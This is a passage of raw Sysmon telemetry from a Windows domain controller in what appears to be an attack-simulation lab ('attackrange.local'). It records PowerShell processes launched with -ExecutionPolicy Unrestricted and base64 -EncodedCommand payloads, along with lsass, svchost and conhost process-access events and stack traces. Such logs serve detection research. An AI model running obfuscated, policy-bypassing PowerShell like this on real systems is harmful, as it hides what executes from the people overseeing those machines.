f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95152edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95136540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95136540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+951363d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95128356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95134889(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+9513447c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+951341a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95133e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95be54db(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+9511acd7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+9511a2a7(wow64) 154100x8000000000000000375Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.628{59A5CD1D-8E1F-6005-CF02-00000000A201}4088C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationCHCP.COM"C:\Windows\system32\chcp.com" 65001C:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E1F-6005-C788-100000000000}0x1088c70HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{59A5CD1D-8E1F-6005-CE02-00000000A201}3720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 10341000x8000000000000000374Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.559{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8E1F-6005-CE02-00000000A201}3720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000373Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.559{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8E1F-6005-CE02-00000000A201}3720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000372Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.528{59A5CD1D-8E1F-6005-CE02-00000000A201}3720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_rmqrj54k.xrf.ps12021-01-18 13:33:19.528 10341000x8000000000000000371Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.513{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E1F-6005-CE02-00000000A201}3720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000370Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.481{59A5CD1D-8E1F-6005-CB02-00000000A201}41484316C:\Windows\system32\conhost.exe{59A5CD1D-8E1F-6005-CE02-00000000A201}3720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000369Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.481{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000368Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.481{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000367Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.481{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000366Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.481{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000365Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.481{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000364Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.481{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000363Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.481{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000362Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.481{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000361Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.481{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000360Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.481{59A5CD1D-8C95-6005-0500-00000000A201}640764C:\Windows\system32\csrss.exe{59A5CD1D-8E1F-6005-CE02-00000000A201}3720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000359Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.481{59A5CD1D-8E1F-6005-CD02-00000000A201}888168C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E1F-6005-CE02-00000000A201}3720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95c9331b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+951341a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95133e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95be54db(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+950f4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95152edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95136540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95136540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+951363d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95128356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95134889(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+9513447c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+951341a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95133e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95be54db(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+9511acd7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+9511a2a7(wow64) 154100x8000000000000000358Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.489{59A5CD1D-8E1F-6005-CE02-00000000A201}3720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==C:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E1F-6005-C788-100000000000}0x1088c70HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{59A5CD1D-8E1F-6005-CD02-00000000A201}888C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBA